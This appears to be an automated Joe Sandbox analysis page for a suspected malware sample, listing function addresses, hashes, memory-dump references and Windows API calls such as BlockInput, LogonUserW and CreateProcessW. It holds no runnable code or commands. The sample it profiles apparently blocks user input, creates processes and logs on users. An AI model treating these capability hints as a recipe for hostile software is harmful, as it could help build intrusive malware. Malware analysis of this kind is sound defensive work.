Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: af1ddced91a49f76b45a52c039c46cfb22e731caa8ab0c33c7a249106f00fe18
Instruction ID: d6f5880bfaa5f075c30e81735a7afe2d14459a8ae0d4024044e6e2351f2d7864
Opcode Fuzzy Hash: af1ddced91a49f76b45a52c039c46cfb22e731caa8ab0c33c7a249106f00fe18
Instruction Fuzzy Hash: 06F0A730200228ABDF145F0ADC16EFE3FA5EB11752F004016F9051B2A2C7769865EBD9

Function 004AAAFC Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 004AAB45

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 7edfdeea96c306c0d75399361dc2057be77a9cbe746c3cd25c15c395a73d81a4
Instruction ID: 45e494fd8357cac06bd9d76d298f14ab6f2514f54bc3084532c5c01e1c2dfa09
Opcode Fuzzy Hash: 7edfdeea96c306c0d75399361dc2057be77a9cbe746c3cd25c15c395a73d81a4
Instruction Fuzzy Hash: 8DF0E230200305DFDB188F04DC21A793FA2FB20362F04421AFD124B6A0D771D820EB64

Function 004E6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 004E6ACA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: b2bd48a48047dcbc96a113a24416073cce962de07c8329505b346afa2816b074
Instruction ID: 22d508d16b9c69fd4eb48294c244d732bd4123b368d38f9892de43ca5b687302
Opcode Fuzzy Hash: b2bd48a48047dcbc96a113a24416073cce962de07c8329505b346afa2816b074
Instruction Fuzzy Hash: A2E012356002046FC700EF5AD404996B7ECAFB57A5F05C47BE945D7251DAB4E8049BA4

Function 004D74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 004D750A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 51a76873fa091ae97c5a4dd3715b627db77013817cc8305ccf2245a130a583e0
Instruction ID: 492f3e949ed63c0c1541ddd022dac610524212f42764a0997695fa9f8e09628b
Opcode Fuzzy Hash: 51a76873fa091ae97c5a4dd3715b627db77013817cc8305ccf2245a130a583e0
Instruction Fuzzy Hash: 74D09EA426C61579EC1A0B24AC3BFB75509F300782FD4454B7603D97C1F8DC6D06A03A

Function 004FF609 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 004FF649

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 493113d1596d9ddb1fffd88b4fbcaa32cd2d6614fc09edd3f09f403cafaa0b51
Instruction ID: f7806dbb1cc7e5cd5481951ccb061ecc8c2b6b2f551eea25ab1d790305119b6f
Opcode Fuzzy Hash: 493113d1596d9ddb1fffd88b4fbcaa32cd2d6614fc09edd3f09f403cafaa0b51
Instruction Fuzzy Hash: D5F06D31241348BFDB21DF58DC15FD67FA9EB15720F044009BA21AB2E1CB746824EB68

Function 004AAB4F Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 004AAB7D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: cc0555d39f18d9fd141eebaa38728d9d7455b50e1ef979cf7da87630bd0847dd
Instruction ID: f1551dcf6d1524640ae7800f1472f553bf048627a91d5fc57d87fca94d499afb
Opcode Fuzzy Hash: cc0555d39f18d9fd141eebaa38728d9d7455b50e1ef979cf7da87630bd0847dd
Instruction Fuzzy Hash: 1DE08C30100204FBCF04AF91CC11F683F2AEB69315F108009BA050A2A2CB37A422EB58

Function 004CB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004CAD3E), ref: 004CB124

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: c5b6ef51558fa54fd722021fc82b8f84ecbcdc3e7d229506f52ee5d7b56f9a98
Instruction ID: 07ee1507bc354856bc4f7049d140b535635eefd85d3f1f7041a1fbe2089e8155
Opcode Fuzzy Hash: c5b6ef51558fa54fd722021fc82b8f84ecbcdc3e7d229506f52ee5d7b56f9a98
Instruction Fuzzy Hash: 5BD05E320A460EAEDF028FA4DC06EAE3F6AEB04700F408110FA11C50A0C672D531EB60

Function 004FF654 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0050E4D1,?,?,?,?,?,?), ref: 004FF67F

Part of subcall function 004FE32E: _memset.LIBCMT ref: 004FE33D
Part of subcall function 004FE32E: _memset.LIBCMT ref: 004FE34C
Part of subcall function 004FE32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00553D00,00553D44), ref: 004FE37B
Part of subcall function 004FE32E: CloseHandle.KERNEL32 ref: 004FE38D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: 8e2777fade3271a64d72aab4fa95be7047236b64dc868e7bc137c63012cd7f97
Instruction ID: eec38dbfb054975b6eee7640b006a3acec9764011515ac57e018a053de606725
Opcode Fuzzy Hash: 8e2777fade3271a64d72aab4fa95be7047236b64dc868e7bc137c63012cd7f97
Instruction Fuzzy Hash: CDE04632100208EFCB01DF05DC49EA63BB6EF18315F02401AFA00472B2CB31AC65EF59

Function 004FF5DA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 004FF5FF

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: a885ddadef2fe81b84f075056c86c8f56eb3ce48266bddc8339e9ac25e8457e2
Instruction ID: 677cd14f077bd3e6dd1eba70712d23758c63200861395ae7fa97c6325919e239
Opcode Fuzzy Hash: a885ddadef2fe81b84f075056c86c8f56eb3ce48266bddc8339e9ac25e8457e2
Instruction Fuzzy Hash: 87E0E234200208EFCB01DF84D844E863BA6EB29310F014054FD044B262CB72A864EBA1

Function 004FF5AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 004FF5D0

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: fdc97087b600f794d3f8c5918b3f8465900f50cb3a9fbe3a659e09f177953937
Instruction ID: c60aa7838250ddef5490319c20b92db534792dd121714b31a89d8a22679c9089
Opcode Fuzzy Hash: fdc97087b600f794d3f8c5918b3f8465900f50cb3a9fbe3a659e09f177953937
Instruction Fuzzy Hash: F5E0E234204208AFCB01DF84DC44E863BA6EB29310F014054FD044B261CB72A820EB61

Function 004AB715 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

Part of subcall function 004AB73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,004AB72B), ref: 004AB7F6
Part of subcall function 004AB73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,004AB72B,00000000,?,?,004AB2EF,?,?), ref: 004AB88D

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,004AB2EF,?,?), ref: 004AB734

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: ba79fd424419c1b50bb87e268d8ac2f2776c7fa07aff67c6e240f4db3c79cc63
Instruction ID: 6fac9090cae86790f432a6d72a8b708d0de179cf3071d5b4e2c63638bca56555
Opcode Fuzzy Hash: ba79fd424419c1b50bb87e268d8ac2f2776c7fa07aff67c6e240f4db3c79cc63
Instruction Fuzzy Hash: ECD0123014030C77DB102B91DD07F893E5FDB61755F408026BA042D1D2CBB6541095AC

Function 0050B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0050B352

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 242c30aa77e4ffca5f43d574afe6a658d26671c9bd83013f1f108d7ae6c0abcb
Instruction ID: 388a02c41f1fbde509ff68327b93d720d41f2488830320fc55be9e3c3abf0571
Opcode Fuzzy Hash: 242c30aa77e4ffca5f43d574afe6a658d26671c9bd83013f1f108d7ae6c0abcb
Instruction Fuzzy Hash: 88C04CB1400109DFD751CBC0C9489EEB7BCBB08301F104091E105F1150D7709B459B72

Function 004B8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 004B818F

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d09a04a7d8c1b5d64d057212a24926035ca22f44a309cd6a3dc6e71cac7aeaa0
Instruction ID: 5a823d97b3ce972943d388514976379f6b7aa6760c0e02e0a1f4ef29755f7467
Opcode Fuzzy Hash: d09a04a7d8c1b5d64d057212a24926035ca22f44a309cd6a3dc6e71cac7aeaa0
Instruction Fuzzy Hash: 0DA0223000020CFBCF002F82FC088C8BF3CFB002A0B008020F80C00030CB33A820AAE2

Function 004993F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72ad53606576e13fef61fa7a0cf2558cdab99aac98f1e27b5ebcf01b8c2fc56
Instruction ID: 26cc016c5c2eaa4ad4369816d22b172a40c522c32f7da140b1bfd1be5ff3d6c8
Opcode Fuzzy Hash: a72ad53606576e13fef61fa7a0cf2558cdab99aac98f1e27b5ebcf01b8c2fc56
Instruction Fuzzy Hash: 6E127F70A002099FDF04DFA9D985AEEBBB5FF58304F10452EE406E7290EB39AD15CB59

Function 0049E3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c26263ec99fb1d9172a3b9a3923ae6d96a10731de84fa3bac139a8ed2d1ce8
Instruction ID: 35faa3e57d1687603323355489b054cd235df27d89dadc4424f80b13a09431a2
Opcode Fuzzy Hash: 67c26263ec99fb1d9172a3b9a3923ae6d96a10731de84fa3bac139a8ed2d1ce8
Instruction Fuzzy Hash: 2F129E74904205DFDF24DF96C480AAEBBB0FF18314F14807AD9469B351E739AD86CB9A

Function 0049AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 5f614df76539a7fdba3a9d9a5372a325e49cc78eff6acff0b4eb007d0a9e326b
Instruction ID: d02a78d02d5dfc97e1adddec1148b972384c76618a693ff7af64fc49689c58d5
Opcode Fuzzy Hash: 5f614df76539a7fdba3a9d9a5372a325e49cc78eff6acff0b4eb007d0a9e326b
Instruction Fuzzy Hash: 6702F370A00209DFCF04DF69D991AAEBBB5FF49304F10807AE806DB295EB39D915CB95

Function 004B02A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: ebd2eed5ccfeecaab9d6971258c8304cdbd301443d7158f7de7fbbb198fbb741
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 60C1B4322051930ADF6D4639843447FBBA15AA27F231A176FD8B3CB6D5EF28C528D634

Function 004B06D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 3f1ad976feb87232c1d48fb44eaef6788856ec2d9793da938a10b8e4868e541a
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: A6C1D43220519309DF6D463AC43447FFAA15EA2BB231A076FD4B3CB6D5EF28D528D624

Function 004AFA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
